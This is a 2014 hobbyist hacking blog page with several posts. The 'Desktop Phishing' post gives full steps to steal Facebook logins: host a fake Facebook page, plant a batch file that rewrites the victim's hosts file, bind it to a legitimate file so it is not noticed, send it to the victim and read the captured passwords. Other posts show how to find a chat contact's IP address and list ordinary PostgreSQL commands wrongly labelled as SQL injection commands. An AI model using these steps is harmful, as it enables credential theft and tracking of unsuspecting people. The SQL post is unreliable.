This Loading Effect is Powered ByMyBloggerLab


Saturday, 19 April 2014

See your friends IP

Go to the command prompt application. If you don’t understand just follow this step (windows XP):
Start >> Run >> cmd >> Enter
Or
Start >> Programs >> Accessories >> Command Prompt

You will see a windows command prompt appear. Then write a command
 “netstat –n” or netstat –a”
 and press enter. Please note that the symbol “ not included when you type that command. You will see information under Active Connections list of Proto, Local Address, Foreign Address and State.

Active Connections indicate the connections being connected to your computer. Proto show the protocol you use to. Local Address refers to Internet Protocol in you LAN connection. Foreign Address indicates the Internet Protocol connection that connect to you and the port they used.

Now you just to seek a remote port that used by foreign address. Usually remote port 80 or 81 is used to transfer a file. Remote Port 5050 used for private message. And 5100 used for web cam. And Remote Port 5000 or 5001 used for voice chat.
The IP address of PM not the real IP of your friend. It belongs to yahoo server IP. But if you send a file or receive a web cam you will be get a real IP of your friend address because yahoo use Peer to Peer connection to service this utility.

sharp ip getter

If you want a better way to get Internet Protocol of your friend, there are many software that designed and developed to get IP address. One of this software I ever tested and worked is Sharp IP Getter. We do not need to send a file or get a web cam to know the Internet Protocol of your friend. We only need have Private Message.

If you want to know about sharp ip and to download it click on Sharp ip getter 
Actually there is a simple steps using command prompt windows to find ip address from chat in yahoo messenger, but this is not the good time I give you that such ways, to get ip of Y!M, because without that steps, with Sharp IP Getter you already knew how to look for the IP address of a user or people in yahoo messenger.

How to use Sharp IP Getter:

Just run the software and instantly you will see a list of IP address in the software. That IP address should be the one / people who chat with you. If you are unable to see the IP, make sure you send a file or image aka photo to the target and the IP address of the target will rise at Sharp IP Getter.



Read More
No comments:

Desktop Phishing

Procedure:-

1. First Download and install xammp on your PC, Start Apache and Msql services

2. Download the Facebook Phisher page From the link given above, Place all its contents in the
ht docs folder which should be under Xammp (place were you installed xampp)

3. Install ProXPN VPN or any other static VPN, i recommend you to use Strong Vpn as it very
stable and gives you a static IP Once you install and run it, you will get a static IP (vpn)

4. Now we have to replace some text in the victims Host file which is
at C:\windows\system32\drivers\etc ,You can do this by many ways either by using a SFX
archive or using a batch file for this tutorial we will use a batch file to accomplish the job
@echo off
echo 172.X.XX.X.X www.facebook.com >> C:\windows\system32\drivers\etc\hosts
exit
Replace "172.X.XX.X.X" with your IP (vpn ) address, Finally save it as Save it as
Something.bat

5. Now to avoid suspicion you can Bind the batch file with a legitimate file, Kindly use Flaming Binder or Grudge Binder to bind files

6. Now send the file via email or upload the file to a site and ask the victim to download the file
, After the victim downloads and clicks the file, his host file will be replaced ,So now when ever
the victim enters facebook.com He/She will be redirected to our Phisher Page, But the URL will
remain as Facebook.com

To see all the victims credentials and Password open newly created log.txt file which is under ht
docs folder

Read More
No comments:

Sunday, 13 April 2014

SQL Injection

HI frnds, 
 
Today I will tell You the useful Commands for Sql


Injection(SQL injection used to hack A wesite)

ABORT -- abort the current transaction
ALTER DATABASE -- change a database

ALTER GROUP -- add users to a group or remove users from a group

ALTER TABLE -- change the definition of a table

ALTER TRIGGER -- change the definition of a trigger

ALTER USER -- change a database user account

ANALYZE -- collect statistics about a database

BEGIN -- start a transaction block

CHECKPOINT -- force a transaction log checkpoint

CLOSE -- close a cursor

CLUSTER -- cluster a table according to an index

COMMENT -- define or change the comment of an object

COMMIT -- commit the current transaction

COPY -- copy data between files and tables

CREATE AGGREGATE -- define a new aggregate function

CREATE CAST -- define a user-defined cast

CREATE CONSTRAINT TRIGGER -- define a new constraint trigger

CREATE CONVERSION -- define a user-defined conversion

CREATE DATABASE -- create a new database

CREATE DOMAIN -- define a new domain

CREATE FUNCTION -- define a new function

CREATE GROUP -- define a new user group

CREATE INDEX -- define a new index

CREATE LANGUAGE -- define a new procedural language

CREATE OPERATOR -- define a new operator

CREATE OPERATOR CLASS -- define a new operator class for indexes

CREATE RULE -- define a new rewrite rule

CREATE SCHEMA -- define a new schema

CREATE SEQUENCE -- define a new sequence generator

CREATE TABLE -- define a new table

CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger

CREATE TYPE -- define a new data type

CREATE USER -- define a new database user account

CREATE VIEW -- define a new view

DEALLOCATE -- remove a prepared query

DECLARE -- define a cursor

DELETE -- delete rows of a table

DROP AGGREGATE -- remove a user-defined aggregate function

DROP CAST -- remove a user-defined cast

DROP CONVERSION -- remove a user-defined conversion

DROP DATABASE -- remove a database

DROP DOMAIN -- remove a user-defined domain

DROP FUNCTION -- remove a user-defined function

DROP GROUP -- remove a user group

Read More
No comments:

Remove Gphone Virus



Well gphone.exe is one of the most dangerous virus spreading very rapidly. It is a Trojan and changes your IE homepage and sends tries to open gtalk and yahoo messenger. It even sends messages to gtalk contacts. Its icon is just like that of folder icon and people thinking of folder click on it get infected by the virus. Gphone virus basically is a 260 kb .exe file which looks like a folder and it can take any name of any other folder if you have clicked on the virus folder which looks like a folder but it is not. If you have a folder name ―movies‖ in your D drive it will make a exe file in the folder named movies.exe and if you click on that exe file it too work as a virus. It makes .exe files in all the folders you have with the name of the folder.
How to remove this virus Method 
method1-
1. Go to Task Manager then Processes and then click on gphone.exe and click on end process.
2. Manually go to folder where gphone.exe is present and delete it.

method 2-
Use the Glary Utilities freeware to remove the exe files.
1. Install the Glary Utilities.
Open it 2. Go to the modules tab -> Files and Folders-> Duplicate files finder. 3. Search for .exe files of same size and delete all the files with size 260 kb

Read More
No comments:

Hack To Set wallpaper In Pen Drive

Are you bored of viewing the same white background in your USB pen drive, here is a trick where you can easily set colorful wallpapers on your USB background.


For that you need the following code:-

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
IconArea_Image=yourpic.bmp
IconArea_Text=0×00000000

1.Copy and paste it in a notepad file.
2.specify the image file name (here it is yourpic.bmp)
3.save it in your memory stick or pendrive as desktop.ini also you are supposed to keep the image file on the memory stick or your pendrive.

Refresh and view the background. Now every time when you open your pendrive it will show background wallpaper.
“I suggest to hide desktop.ini after creation this will help to you hide your code so that no one can see how this was done.

SOURCE:- Hacking crux by "Hammad Kiyani"

Read More
No comments:

Security Kiss (Proxy Software)

Its available on all platforms like mac windows linux android,ios

SecurityKISS  is the program and the service that allows you access to the Internet despite censorship and local restrictions. It also makes your connection secure and prevents others from viewing your web browsing activities, instant messages, downloads, credit card information or anything else you send over the network.
Technically SecurityKISS is a Virtual Private Network (VPN) implementation. It creates a VPN between your computer and our security gateway so that all your internet traffic travels through an impenetrable, non-transparent tunnel.
For download Click here


Read More
No comments:

Proxifier (Proxy Software)

  • Proxifier allows network applications that do not support working through proxy servers to operate through a SOCKS or HTTPS proxy and chains
    Work with any Internet client through a proxy.
  • It Can Do :
  • Improve network performance or ensure privacy.
  • Flexible rule system.
  • Easy yet powerful UI with live data.
  • Up to date with new technologies.
  • Its available in mac nd windows
For download Click Here

Read More
No comments:

Blog Archive